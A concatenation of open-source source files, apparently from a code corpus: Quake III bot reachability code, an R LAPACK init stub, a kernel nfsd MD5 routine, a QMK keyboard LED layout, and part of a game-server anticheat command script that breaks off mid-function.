if (!(face3->faceflags & FACE_SOLID))
{
gap = qtrue;
break;
} //end if
//
if (face3->faceflags & FACE_GROUND)
{
gap = qfalse;
break;
} //end if
//FIXME: there are more situations to be handled
gap = qtrue;
break;
} //end if
} //end for
if (m < face3->numedges) break;
} //end for
if (!gap) break;
} //end if
//check for a walk off ledge reachability
edge = &aasworld.edges[abs(edge1num)];
side = edge1num < 0;
//
v1 = aasworld.vertexes[edge->v[side]];
v2 = aasworld.vertexes[edge->v[!side]];
//
plane = &aasworld.planes[face1->planenum];
//get the points really into the areas
VectorSubtract(v2, v1, sharededgevec);
CrossProduct(plane->normal, sharededgevec, dir);
VectorNormalize(dir);
//
VectorAdd(v1, v2, mid);
VectorScale(mid, 0.5, mid);
VectorMA(mid, 8, dir, mid);
//
VectorCopy(mid, testend);
testend[2] -= 1000;
trace = AAS_TraceClientBBox(mid, testend, PRESENCE_CROUCH, -1);
//
if (trace.startsolid)
{
//Log_Write("area %d: trace.startsolid\r\n", areanum);
break;
} //end if
reachareanum = AAS_PointAreaNum(trace.endpos);
if (reachareanum == areanum)
{
//Log_Write("area %d: same area\r\n", areanum);
break;
} //end if
if (AAS_ReachabilityExists(areanum, reachareanum))
{
//Log_Write("area %d: reachability already exists\r\n", areanum);
break;
} //end if
if (!AAS_AreaGrounded(reachareanum) && !AAS_AreaSwim(reachareanum))
{
//Log_Write("area %d, reach area %d: not grounded and not swim\r\n", areanum, reachareanum);
break;
} //end if
//
if (aasworld.areasettings[reachareanum].contents & (AREACONTENTS_SLIME
| AREACONTENTS_LAVA))
{
//Log_Write("area %d, reach area %d: lava or slime\r\n", areanum, reachareanum);
break;
} //end if
//if not going through a cluster portal
numareas = AAS_TraceAreas(mid, testend, areas, NULL, ARRAY_LEN(areas));
for (p = 0; p < numareas; p++)
if (AAS_AreaClusterPortal(areas[p]))
break;
if (p < numareas)
break;
// if a maximum fall height is set and the bot would fall down further
if (aassettings.rs_maxfallheight && fabs(mid[2] - trace.endpos[2]) > aassettings.rs_maxfallheight)
break;
//
lreach = AAS_AllocReachability();
if (!lreach) break;
lreach->areanum = reachareanum;
lreach->facenum = 0;
lreach->edgenum = edge1num;
VectorCopy(mid, lreach->start);
VectorCopy(trace.endpos, lreach->end);
lreach->traveltype = TRAVEL_WALKOFFLEDGE;
lreach->traveltime = aassettings.rs_startwalkoffledge + fabs(mid[2] - trace.endpos[2]) * 50 / aassettings.phys_gravity;
if (!AAS_AreaSwim(reachareanum) && !AAS_AreaJumpPad(reachareanum))
{
if (AAS_FallDelta(mid[2] - trace.endpos[2]) > aassettings.phys_falldelta5)
{
lreach->traveltime += aassettings.rs_falldamage5;
} //end if
else if (AAS_FallDelta(mid[2] - trace.endpos[2]) > aassettings.phys_falldelta10)
{
lreach->traveltime += aassettings.rs_falldamage10;
} //end if
} //end if
lreach->next = areareachability[areanum];
areareachability[areanum] = lreach;
//we've got another walk off ledge reachability
reach_walkoffledge++;
} //end if
} //end for
} //end for
} //end for
} //end for
} //end of the function AAS_Reachability_WalkOffLedge
//===========================================================================
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
void AAS_StoreReachability(void)
{
int i;
aas_areasettings_t *areasettings;
aas_lreachability_t *lreach;
aas_reachability_t *reach;
if (aasworld.reachability) FreeMemory(aasworld.reachability);
aasworld.reachability = (aas_reachability_t *) GetClearedMemory((numlreachabilities + 10) * sizeof(aas_reachability_t));
aasworld.reachabilitysize = 1;
for (i = 0; i < aasworld.numareas; i++)
{
areasettings = &aasworld.areasettings[i];
areasettings->firstreachablearea = aasworld.reachabilitysize;
areasettings->numreachableareas = 0;
for (lreach = areareachability[i]; lreach; lreach = lreach->next)
{
reach = &aasworld.reachability[areasettings->firstreachablearea +
areasettings->numreachableareas];
reach->areanum = lreach->areanum;
reach->facenum = lreach->facenum;
reach->edgenum = lreach->edgenum;
VectorCopy(lreach->start, reach->start);
VectorCopy(lreach->end, reach->end);
reach->traveltype = lreach->traveltype;
reach->traveltime = lreach->traveltime;
//
areasettings->numreachableareas++;
} //end for
aasworld.reachabilitysize += areasettings->numreachableareas;
} //end for
} //end of the function AAS_StoreReachability
//===========================================================================
//
// TRAVEL_WALK 100% equal floor height + steps
// TRAVEL_CROUCH 100%
// TRAVEL_BARRIERJUMP 100%
// TRAVEL_JUMP 80%
// TRAVEL_LADDER 100% + fall down from ladder + jump up to ladder
// TRAVEL_WALKOFFLEDGE 90% walk off very steep walls?
// TRAVEL_SWIM 100%
// TRAVEL_WATERJUMP 100%
// TRAVEL_TELEPORT 100%
// TRAVEL_ELEVATOR 100%
// TRAVEL_GRAPPLEHOOK 100%
// TRAVEL_DOUBLEJUMP 0%
// TRAVEL_RAMPJUMP 0%
// TRAVEL_STRAFEJUMP 0%
// TRAVEL_ROCKETJUMP 100% (currently limited towards areas with items)
// TRAVEL_BFGJUMP 0% (currently disabled)
// TRAVEL_JUMPPAD 100%
// TRAVEL_FUNCBOB 100%
//
// Parameter: -
// Returns: true if NOT finished
// Changes Globals: -
//===========================================================================
int AAS_ContinueInitReachability(float time)
{
int i, j, todo, start_time;
static float framereachability, reachability_delay;
static int lastpercentage;
if (!aasworld.loaded) return qfalse;
//if reachability is calculated for all areas
if (aasworld.numreachabilityareas >= aasworld.numareas + 2) return qfalse;
//if starting with area 1 (area 0 is a dummy)
if (aasworld.numreachabilityareas == 1)
{
botimport.Print(PRT_MESSAGE, "calculating reachability...\n");
lastpercentage = 0;
framereachability = 2000;
reachability_delay = 1000;
} //end if
//number of areas to calculate reachability for this cycle
todo = aasworld.numreachabilityareas + (int) framereachability;
start_time = Sys_MilliSeconds();
//loop over the areas
for (i = aasworld.numreachabilityareas; i < aasworld.numareas && i < todo; i++)
{
aasworld.numreachabilityareas++;
//only create jumppad reachabilities from jumppad areas
if (aasworld.areasettings[i].contents & AREACONTENTS_JUMPPAD)
{
continue;
} //end if
//loop over the areas
for (j = 1; j < aasworld.numareas; j++)
{
if (i == j) continue;
//never create reachabilities from teleporter or jumppad areas to regular areas
if (aasworld.areasettings[i].contents & (AREACONTENTS_TELEPORTER|AREACONTENTS_JUMPPAD))
{
if (!(aasworld.areasettings[j].contents & (AREACONTENTS_TELEPORTER|AREACONTENTS_JUMPPAD)))
{
continue;
} //end if
} //end if
//if there already is a reachability link from area i to j
if (AAS_ReachabilityExists(i, j)) continue;
//check for a swim reachability
if (AAS_Reachability_Swim(i, j)) continue;
//check for a simple walk on equal floor height reachability
if (AAS_Reachability_EqualFloorHeight(i, j)) continue;
//check for step, barrier, waterjump and walk off ledge reachabilities
if (AAS_Reachability_Step_Barrier_WaterJump_WalkOffLedge(i, j)) continue;
//check for ladder reachabilities
if (AAS_Reachability_Ladder(i, j)) continue;
//check for a jump reachability
if (AAS_Reachability_Jump(i, j)) continue;
} //end for
//never create these reachabilities from teleporter or jumppad areas
if (aasworld.areasettings[i].contents & (AREACONTENTS_TELEPORTER|AREACONTENTS_JUMPPAD))
{
continue;
} //end if
//loop over the areas
for (j = 1; j < aasworld.numareas; j++)
{
if (i == j) continue;
//
if (AAS_ReachabilityExists(i, j)) continue;
//check for a grapple hook reachability
if (calcgrapplereach) AAS_Reachability_Grapple(i, j);
//check for a weapon jump reachability
AAS_Reachability_WeaponJump(i, j);
} //end for
//if the calculation took more time than the max reachability delay
if (Sys_MilliSeconds() - start_time > (int) reachability_delay) break;
//
if (aasworld.numreachabilityareas * 1000 / aasworld.numareas > lastpercentage) break;
} //end for
//
if (aasworld.numreachabilityareas == aasworld.numareas)
{
botimport.Print(PRT_MESSAGE, "\r%6.1f%%", (float) 100.0);
botimport.Print(PRT_MESSAGE, "\nplease wait while storing reachability...\n");
aasworld.numreachabilityareas++;
} //end if
//if this is the last step in the reachability calculations
else if (aasworld.numreachabilityareas == aasworld.numareas + 1)
{
//create additional walk off ledge reachabilities for every area
for (i = 1; i < aasworld.numareas; i++)
{
//only create jumppad reachabilities from jumppad areas
if (aasworld.areasettings[i].contents & AREACONTENTS_JUMPPAD)
{
continue;
} //end if
AAS_Reachability_WalkOffLedge(i);
} //end for
//create jump pad reachabilities
AAS_Reachability_JumpPad();
//create teleporter reachabilities
AAS_Reachability_Teleport();
//create elevator (func_plat) reachabilities
AAS_Reachability_Elevator();
//create func_bobbing reachabilities
AAS_Reachability_FuncBobbing();
//
#ifdef DEBUG
botimport.Print(PRT_MESSAGE, "%6d reach swim\n", reach_swim);
botimport.Print(PRT_MESSAGE, "%6d reach equal floor\n", reach_equalfloor);
botimport.Print(PRT_MESSAGE, "%6d reach step\n", reach_step);
botimport.Print(PRT_MESSAGE, "%6d reach barrier\n", reach_barrier);
botimport.Print(PRT_MESSAGE, "%6d reach waterjump\n", reach_waterjump);
botimport.Print(PRT_MESSAGE, "%6d reach walkoffledge\n", reach_walkoffledge);
botimport.Print(PRT_MESSAGE, "%6d reach jump\n", reach_jump);
botimport.Print(PRT_MESSAGE, "%6d reach ladder\n", reach_ladder);
botimport.Print(PRT_MESSAGE, "%6d reach walk\n", reach_walk);
botimport.Print(PRT_MESSAGE, "%6d reach teleport\n", reach_teleport);
botimport.Print(PRT_MESSAGE, "%6d reach funcbob\n", reach_funcbob);
botimport.Print(PRT_MESSAGE, "%6d reach elevator\n", reach_elevator);
botimport.Print(PRT_MESSAGE, "%6d reach grapple\n", reach_grapple);
botimport.Print(PRT_MESSAGE, "%6d reach rocketjump\n", reach_rocketjump);
botimport.Print(PRT_MESSAGE, "%6d reach jumppad\n", reach_jumppad);
#endif
//*/
//store all the reachabilities
AAS_StoreReachability();
//free the reachability link heap
AAS_ShutDownReachabilityHeap();
//
FreeMemory(areareachability);
//
aasworld.numreachabilityareas++;
//
botimport.Print(PRT_MESSAGE, "calculating clusters...\n");
} //end if
else
{
lastpercentage = aasworld.numreachabilityareas * 1000 / aasworld.numareas;
botimport.Print(PRT_MESSAGE, "\r%6.1f%%", (float) lastpercentage / 10);
} //end else
//not yet finished
return qtrue;
} //end of the function AAS_ContinueInitReachability
//===========================================================================
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
void AAS_InitReachability(void)
{
if (!aasworld.loaded) return;
if (aasworld.reachabilitysize)
{
#ifndef BSPC
if (!((int)LibVarGetValue("forcereachability")))
{
aasworld.numreachabilityareas = aasworld.numareas + 2;
return;
} //end if
#else
aasworld.numreachabilityareas = aasworld.numareas + 2;
return;
#endif //BSPC
} //end if
#ifndef BSPC
calcgrapplereach = LibVarGetValue("grapplereach");
#endif
aasworld.savefile = qtrue;
//start with area 1 because area zero is a dummy
aasworld.numreachabilityareas = 1;
////aasworld.numreachabilityareas = aasworld.numareas + 1; //only calculate entity reachabilities
//setup the heap with reachability links
AAS_SetupReachabilityHeap();
//allocate area reachability link array
areareachability = (aas_lreachability_t **) GetClearedMemory(
aasworld.numareas * sizeof(aas_lreachability_t *));
//
AAS_SetWeaponJumpAreaFlags();
} //end of the function AAS_InitReachable
| gpl-2.0 |
radfordneal/pqR | src/modules/lapack/init_win.c | 4 | 1084 | /*
* R : A Computer Language for Statistical Data Analysis
* Copyright (C) 2001-2010 The R Core Team
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, a copy is available at
* http://www.r-project.org/Licenses/
*/
#ifdef HAVE_CONFIG_H
#include <config.h>
#endif
#ifdef WIN32
# include <fcntl.h>
static void __attribute__((constructor))
init(void)
{
/* gfortran initialization sets these to _O_BINARY */
setmode(1,_O_TEXT); /* stdout */
setmode(2,_O_TEXT); /* stderr */
return;
}
#endif
| gpl-2.0 |
spacex/kernel-centos6 | fs/nfsd/md5.c | 4 | 3257 | /*
* MD5 Message Digest Algorithm (RFC1321) (internal knfsd implementation)
*
* Derived from cryptoapi implementation, originally based on the
* public domain implementation written by Colin Plumb in 1993.
*
* Copyright (c) Cryptoapi developers.
* Copyright (c) 2002 James Morris <jmorris@intercode.com.au>
* Copyright (c) 2013 Jeff Layton <jlayton@redhat.com>
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the Free
* Software Foundation; either version 2 of the License, or (at your option)
* any later version.
*/
#include <linux/string.h>
#include <linux/types.h>
#include <linux/cryptohash.h>
#include <asm/byteorder.h>
#include <linux/slab.h>
#define MD5_DIGEST_SIZE 16
#define MD5_HMAC_BLOCK_SIZE 64
#define MD5_BLOCK_WORDS 16
#define MD5_HASH_WORDS 4
struct md5_ctx {
u32 hash[MD5_HASH_WORDS];
u32 block[MD5_BLOCK_WORDS];
u64 byte_count;
};
/* XXX: this stuff can be optimized */
static inline void le32_to_cpu_array(u32 *buf, unsigned int words)
{
while (words--) {
__le32_to_cpus(buf);
buf++;
}
}
static inline void cpu_to_le32_array(u32 *buf, unsigned int words)
{
while (words--) {
__cpu_to_le32s(buf);
buf++;
}
}
static inline void md5_transform_helper(struct md5_ctx *ctx)
{
le32_to_cpu_array(ctx->block, sizeof(ctx->block) / sizeof(u32));
md5_transform(ctx->hash, ctx->block);
}
static void md5_init(struct md5_ctx *mctx)
{
mctx->hash[0] = 0x67452301;
mctx->hash[1] = 0xefcdab89;
mctx->hash[2] = 0x98badcfe;
mctx->hash[3] = 0x10325476;
mctx->byte_count = 0;
}
static void md5_update(struct md5_ctx *mctx, const u8 *data, unsigned int len)
{
const u32 avail = sizeof(mctx->block) - (mctx->byte_count & 0x3f);
mctx->byte_count += len;
if (avail > len) {
memcpy((char *)mctx->block + (sizeof(mctx->block) - avail),
data, len);
return;
}
memcpy((char *)mctx->block + (sizeof(mctx->block) - avail),
data, avail);
md5_transform_helper(mctx);
data += avail;
len -= avail;
while (len >= sizeof(mctx->block)) {
memcpy(mctx->block, data, sizeof(mctx->block));
md5_transform_helper(mctx);
data += sizeof(mctx->block);
len -= sizeof(mctx->block);
}
memcpy(mctx->block, data, len);
}
static void md5_final(struct md5_ctx *mctx, u8 *out)
{
const unsigned int offset = mctx->byte_count & 0x3f;
char *p = (char *)mctx->block + offset;
int padding = 56 - (offset + 1);
*p++ = 0x80;
if (padding < 0) {
memset(p, 0x00, padding + sizeof(u64));
md5_transform_helper(mctx);
p = (char *)mctx->block;
padding = 56;
}
memset(p, 0, padding);
mctx->block[14] = mctx->byte_count << 3;
mctx->block[15] = mctx->byte_count >> 29;
le32_to_cpu_array(mctx->block, (sizeof(mctx->block) -
sizeof(u64)) / sizeof(u32));
md5_transform(mctx->hash, mctx->block);
cpu_to_le32_array(mctx->hash, sizeof(mctx->hash) / sizeof(u32));
memcpy(out, mctx->hash, sizeof(mctx->hash));
memset(mctx, 0, sizeof(*mctx));
}
int
nfsd_md5_digest(u8 *out, u8 *data, unsigned int len)
{
struct md5_ctx *mctx;
mctx = kmalloc(sizeof(*mctx), GFP_KERNEL);
if (!mctx)
return -ENOMEM;
md5_init(mctx);
md5_update(mctx, data, len);
md5_final(mctx, out);
kfree(mctx);
return 0;
}
| gpl-2.0 |
zabereer/qmk_firmware | keyboards/k_type/k_type.c | 4 | 8531 | /*
Copyright 2012,2013 Jun Wako <wakojun@gmail.com>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#include "k_type.h"
#ifdef RGB_MATRIX_ENABLE
#include "is31fl3733-dual.h"
const is31_led __flash g_is31_leds[DRIVER_LED_TOTAL] = {
{ 0, B_1, A_1, C_1 },
{ 0, B_2, A_2, C_2 },
{ 0, B_3, A_3, C_3 },
{ 0, B_4, A_4, C_4 },
{ 0, B_5, A_5, C_5 },
{ 0, B_6, A_6, C_6 },
{ 0, B_7, A_7, C_7 },
{ 0, B_8, A_8, C_8 },
{ 0, B_9, A_9, C_9 },
{ 0, B_10, A_10, C_10 },
{ 0, B_11, A_11, C_11 },
{ 0, B_12, A_12, C_12 },
{ 0, B_13, A_13, C_13 },
{ 0, B_14, A_14, C_14 },
{ 0, B_15, A_15, C_15 },
{ 0, B_16, A_16, C_16 },
{ 0, E_1, D_1, F_1 },
{ 0, E_2, D_2, F_2 },
{ 0, E_3, D_3, F_3 },
{ 0, E_4, D_4, F_4 },
{ 0, E_5, D_5, F_5 },
{ 0, E_6, D_6, F_6 },
{ 0, E_7, D_7, F_7 },
{ 0, E_8, D_8, F_8 },
{ 0, E_9, D_9, F_9 },
{ 0, E_10, D_10, F_10 },
{ 0, E_11, D_11, F_11 },
{ 0, E_12, D_12, F_12 },
{ 0, E_13, D_13, F_13 },
{ 0, E_14, D_14, F_14 },
{ 0, E_15, D_15, F_15 },
{ 0, E_16, D_16, F_16 },
{ 0, H_1, G_1, I_1 },
{ 0, H_2, G_2, I_2 },
{ 0, H_3, G_3, I_3 },
{ 0, H_4, G_4, I_4 },
{ 0, H_5, G_5, I_5 },
{ 0, H_6, G_6, I_6 },
{ 0, H_7, G_7, I_7 },
{ 0, H_8, G_8, I_8 },
{ 0, H_9, G_9, I_9 },
{ 0, H_10, G_10, I_10 },
{ 0, H_11, G_11, I_11 },
{ 0, H_12, G_12, I_12 },
{ 0, H_13, G_13, I_13 },
{ 0, H_14, G_14, I_14 },
{ 0, H_15, G_15, I_15 },
{ 0, H_16, G_16, I_16 },
{ 0, K_1, J_1, L_1 },
{ 0, K_2, J_2, L_2 },
{ 0, K_3, J_3, L_3 },
{ 0, K_4, J_4, L_4 },
{ 0, K_5, J_5, L_5 },
{ 0, K_6, J_6, L_6 },
{ 0, K_7, J_7, L_7 },
{ 0, K_8, J_8, L_8 },
{ 0, K_9, J_9, L_9 },
{ 0, K_10, J_10, L_10 },
{ 0, K_11, J_11, L_11 },
{ 0, K_12, J_12, L_12 },
{ 0, K_13, J_13, L_13 },
{ 0, K_14, J_14, L_14 },
{ 0, K_15, J_15, L_15 },
{ 0, K_16, J_16, L_16 },
// Driver 2 is on I2C2 - currently not usable with i2c_master
{ 1, B_1, A_1, C_1 },
{ 1, B_2, A_2, C_2 },
{ 1, B_3, A_3, C_3 },
{ 1, B_4, A_4, C_4 },
{ 1, B_5, A_5, C_5 },
{ 1, B_6, A_6, C_6 },
{ 1, B_7, A_7, C_7 },
{ 1, B_8, A_8, C_8 },
{ 1, B_9, A_9, C_9 },
{ 1, B_10, A_10, C_10 },
{ 1, B_11, A_11, C_11 },
{ 1, B_12, A_12, C_12 },
{ 1, B_13, A_13, C_13 },
{ 1, B_14, A_14, C_14 },
{ 1, B_15, A_15, C_15 },
{ 1, B_16, A_16, C_16 },
{ 1, E_1, D_1, F_1 },
{ 1, E_2, D_2, F_2 },
{ 1, E_3, D_3, F_3 },
{ 1, E_4, D_4, F_4 },
{ 1, E_5, D_5, F_5 },
{ 1, E_6, D_6, F_6 },
{ 1, E_7, D_7, F_7 },
{ 1, E_8, D_8, F_8 },
{ 1, E_9, D_9, F_9 },
{ 1, E_10, D_10, F_10 },
{ 1, E_11, D_11, F_11 },
{ 1, E_12, D_12, F_12 },
{ 1, E_13, D_13, F_13 },
{ 1, E_14, D_14, F_14 },
{ 1, E_15, D_15, F_15 },
{ 1, E_16, D_16, F_16 },
{ 1, H_1, G_1, I_1 },
{ 1, H_2, G_2, I_2 },
{ 1, H_3, G_3, I_3 },
{ 1, H_4, G_4, I_4 },
{ 1, H_5, G_5, I_5 },
{ 1, H_6, G_6, I_6 },
{ 1, H_7, G_7, I_7 },
{ 1, H_8, G_8, I_8 },
{ 1, H_9, G_9, I_9 },
{ 1, H_10, G_10, I_10 },
{ 1, H_11, G_11, I_11 },
{ 1, H_12, G_12, I_12 },
{ 1, H_13, G_13, I_13 },
{ 1, H_14, G_14, I_14 },
{ 1, H_15, G_15, I_15 },
{ 1, H_16, G_16, I_16 },
{ 1, K_1, J_1, L_1 },
{ 1, K_2, J_2, L_2 },
{ 1, K_3, J_3, L_3 },
{ 1, K_4, J_4, L_4 },
{ 1, K_5, J_5, L_5 },
{ 1, K_6, J_6, L_6 },
{ 1, K_7, J_7, L_7 }
};
led_config_t g_led_config = {
{
// Key Matrix to LED Index
{ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9 },
{ 10, 11, 12, 13, 14, 15, 16, 17, 18, 19 },
{ 20, 21, 22, 23, 24, 25, 26, 27, 28, NO_LED },
{ 29, NO_LED, 30, 31, 32, 33, 34, 35, 36, 37 },
{ 38, 39, 40, 41, 42, 43, 44, 45, 46, NO_LED },
{ 47, 48, 49, 50, 51, 52, 53, 54, 55, 56 },
{ 57, 58, 59, 60, 61, NO_LED, 62, NO_LED, 63, NO_LED },
{ 64, 65, 66, 67, 68, 69, 70, 71, 72, 73 },
{ NO_LED, 74, NO_LED, 75, 76, 77, 78, 79, 80, 81 },
{ 82, 83, 84, 85, 86, NO_LED, NO_LED, NO_LED, NO_LED, NO_LED }
}, {
// LED Index to Physical Position
// Key LED
{ 0, 0 }, { 26.35, 0 }, { 39.53, 0 }, { 52.71, 0 }, { 65.88, 0 }, { 79.06, 0 }, { 92.24, 0 }, { 105.41, 0 }, { 118.59, 0 }, { 131.77, 0 }, { 144.94, 0 }, { 158.12, 0 }, { 171.29, 0 }, { 197.65, 0 }, { 210.82, 0 }, { 224, 0 },
{ 0, 21.33 }, { 13.18, 21.33 }, { 26.35, 21.33 }, { 39.53, 21.33 }, { 52.71, 21.33 }, { 65.88, 21.33 }, { 79.06, 21.33 }, { 92.24, 21.33 }, { 105.41, 21.33 }, { 118.59, 21.33 }, { 131.77, 21.33 }, { 144.94, 21.33 }, { 158.12, 21.33 }, { 171.29, 21.33 }, { 197.65, 21.33 }, { 210.82, 21.33 }, { 224, 21.33 },
{ 0, 32 }, { 13.18, 32 }, { 26.35, 32 }, { 39.53, 32 }, { 52.71, 32 }, { 65.88, 32 }, { 79.06, 32 }, { 92.24, 32 }, { 105.41, 32 }, { 118.59, 32 }, { 131.77, 32 }, { 144.94, 32 }, { 158.12, 32 }, { 171.29, 32 }, { 197.65, 32 }, { 210.82, 32 }, { 224, 32 },
{ 0, 42.67 }, { 13.18, 42.67 }, { 26.35, 42.67 }, { 39.53, 42.67 }, { 52.71, 42.67 }, { 65.88, 42.67 }, { 79.06, 42.67 }, { 92.24, 42.67 }, { 105.41, 42.67 }, { 118.59, 42.67 }, { 131.77, 42.67 }, { 144.94, 42.67 }, { 171.29, 42.67 },
{ 0, 53.33 }, { 26.35, 53.33 }, { 39.53, 53.33 }, { 52.71, 53.33 }, { 65.88, 53.33 }, { 79.06, 53.33 }, { 92.24, 53.33 }, { 105.41, 53.33 }, { 118.59, 53.33 }, { 131.77, 53.33 }, { 144.94, 53.33 }, { 171.29, 53.33 }, { 210.82, 53.33 },
{ 0, 64 }, { 13.18, 64 }, { 26.35, 64 }, { 79.06, 64 }, { 131.77, 64 }, { 144.94, 64 }, { 158.12, 64 }, { 171.29, 64 }, { 197.65, 64 }, { 210.82, 64 }, { 224, 64 },
// Underglow LED
{ 224, 64 }, { 206.77, 64 }, { 189.54, 64 }, { 172.31, 64 }, { 155.08, 64 }, { 137.85, 64 }, { 120.61, 64 }, { 103.38, 64 }, { 86.15, 64 }, { 68.92, 64 }, { 51.69, 64 }, { 34.46, 64 }, { 17.23, 64 }, { 0, 64 },
{ 0, 42.67 }, { 0, 21.33 },
{ 0, 0 }, { 17.23, 0 }, { 34.46, 0 }, { 51.69, 0 }, { 68.92, 0 }, { 86.15, 0 }, { 103.38, 0 }, { 120.61, 0 }, { 137.85, 0 }, { 155.08, 0 }, { 172.31, 0 }, { 189.54, 0 }, { 206.77, 0 }, { 224, 0 },
{ 224, 21.33 }, { 224, 42.67 }
}, {
// LED Index to Flag
//Key LED
1, 4, 4, 4, 4, 1, 1, 1, 1, 4, 4, 4, 4, 1, 1, 1,
1, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 1, 4, 4, 4,
1, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4,
1, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 1,
1, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 1, 1,
1, 1, 1, 4, 1, 1, 1, 1, 1, 1, 1,
// Underglow LED
2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2,
2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
}
};
#endif
| gpl-2.0 |
josemikkola/Core | Core/src/server/scripts/Commands/cs_anticheat.cpp | 4 | 8727 | /*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation; either version 2 of the License, or (at your
* option) any later version.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
* more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#include "ScriptMgr.h"
#include "ObjectMgr.h"
#include "Chat.h"
#include "AnticheatMgr.h"
#include "Language.h"
class anticheat_commandscript : public CommandScript
{
public:
anticheat_commandscript() : CommandScript("anticheat_commandscript") { }
ChatCommand* GetCommands() const
{
static ChatCommand anticheatCommandTable[] =
{
{ "global", SEC_GAMEMASTER, true, &HandleAntiCheatGlobalCommand, "", NULL },
{ "player", SEC_GAMEMASTER, true, &HandleAntiCheatPlayerCommand, "", NULL },
{ "delete", SEC_ADMINISTRATOR, true, &HandleAntiCheatDeleteCommand, "", NULL },
{ "handle", SEC_ADMINISTRATOR, true, &HandleAntiCheatHandleCommand, "", NULL },
{ "jail", SEC_GAMEMASTER, true, &HandleAnticheatJailCommand, "", NULL },
{ "warn", SEC_GAMEMASTER, true, &HandleAnticheatWarnCommand, "", NULL },
{ NULL, 0, false, NULL, "", NULL }
};
static ChatCommand commandTable[] =
{
{ "anticheat", SEC_GAMEMASTER, true, NULL, "", anticheatCommandTable},
{ NULL, 0, false, NULL, "", NULL }
};
return commandTable;
}
static bool HandleAnticheatWarnCommand(ChatHandler* handler, const char* args)
{
if (!sWorld->getBoolConfig(CONFIG_ANTICHEAT_ENABLE))
return false;
Player* pTarget = NULL;
std::string strCommand;
char* command = strtok((char*)args, " ");
if (command)
{
strCommand = command;
normalizePlayerName(strCommand);
pTarget = sObjectAccessor->FindPlayerByName(strCommand.c_str()); //get player by name
}else
pTarget = handler->getSelectedPlayer();
if (!pTarget)
return false;
WorldPacket data;
// need copy to prevent corruption by strtok call in LineFromMessage original string
char* buf = strdup("The anticheat system has reported several times that you may be cheating. You will be monitored to confirm if this is accurate.");
char* pos = buf;
while (char* line = handler->LineFromMessage(pos))
{
handler->FillSystemMessageData(&data, line);
pTarget->GetSession()->SendPacket(&data);
}
free(buf);
return true;
}
static bool HandleAnticheatJailCommand(ChatHandler* handler, const char* args)
{
if (!sWorld->getBoolConfig(CONFIG_ANTICHEAT_ENABLE))
return false;
Player* pTarget = NULL;
std::string strCommand;
char* command = strtok((char*)args, " ");
if (command)
{
strCommand = command;
normalizePlayerName(strCommand);
pTarget = sObjectAccessor->FindPlayerByName(strCommand.c_str()); //get player by name
}else
pTarget = handler->getSelectedPlayer();
if (!pTarget)
{
handler->SendSysMessage(LANG_PLAYER_NOT_FOUND);
handler->SetSentErrorMessage(true);
return false;
}
if (pTarget == handler->GetSession()->GetPlayer())
return false;
// teleport both to jail.
pTarget->TeleportTo(1,16226.5f,16403.6f,-64.5f,3.2f);
handler->GetSession()->GetPlayer()->TeleportTo(1,16226.5f,16403.6f,-64.5f,3.2f);
WorldLocation loc;
// the player should be already there, but no :(
// pTarget->GetPosition(&loc);
loc.m_mapId = 1;
loc.m_positionX = 16226.5f;
loc.m_positionY = 16403.6f;
loc.m_positionZ = -64.5f;
loc.m_orientation = 3.2f;
pTarget->SetHomebind(loc,876);
return true;
}
static bool HandleAntiCheatDeleteCommand(ChatHandler* handler, const char* args)
{
if (!sWorld->getBoolConfig(CONFIG_ANTICHEAT_ENABLE))
return false;
std::string strCommand;
char* command = strtok((char*)args, " "); //get entered name
if (!command)
return true;
strCommand = command;
if (strCommand.compare("deleteall") == 0)
sAnticheatMgr->AnticheatDeleteCommand(0);
else
{
normalizePlayerName(strCommand);
Player* player = sObjectAccessor->FindPlayerByName(strCommand.c_str()); //get player by name
if (!player)
handler->PSendSysMessage("Player doesn't exist");
else
sAnticheatMgr->AnticheatDeleteCommand(player->GetGUIDLow());
}
return true;
}
static bool HandleAntiCheatPlayerCommand(ChatHandler* handler, const char* args)
{
if (!sWorld->getBoolConfig(CONFIG_ANTICHEAT_ENABLE))
return false;
std::string strCommand;
char* command = strtok((char*)args, " ");
uint32 guid = 0;
Player* player = NULL;
if (command)
{
strCommand = command;
normalizePlayerName(strCommand);
player = sObjectAccessor->FindPlayerByName(strCommand.c_str()); //get player by name
if (player)
guid = player->GetGUIDLow();
}else
{
player = handler->getSelectedPlayer();
if (player)
guid = player->GetGUIDLow();
}
if (!guid)
{
handler->PSendSysMessage("There is no player.");
return true;
}
float average = sAnticheatMgr->GetAverage(guid);
uint32 total_reports = sAnticheatMgr->GetTotalReports(guid);
uint32 speed_reports = sAnticheatMgr->GetTypeReports(guid,0);
uint32 fly_reports = sAnticheatMgr->GetTypeReports(guid,1);
